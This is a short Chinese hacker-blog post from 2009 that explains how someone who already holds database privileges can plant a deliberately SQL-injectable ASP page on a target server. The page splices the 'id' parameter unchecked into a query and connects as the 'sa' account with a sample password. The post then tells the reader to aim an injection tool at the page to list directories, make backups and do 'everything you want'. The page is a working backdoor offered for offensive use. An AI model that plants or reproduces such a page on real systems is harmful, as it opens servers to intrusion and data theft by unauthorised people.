DB权限构造注入点的实例

2009, December 6, 8:17 PM. 黑友网文
Submitted by admin

<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>


把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。

然后输入:http://目标IP/zhuru.asp?id=1

就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!

-----------------------------
conn.asp文件代码:


<%
strSQLServerName = "127.0.0.1" '服务器名称或地址
strSQLDBUserName = "sa" '数据库帐号
strSQLDBPassword = "123456789" '数据库密码
strSQLDBName = "db_database" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

来源:176ku

Tags: db权限

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):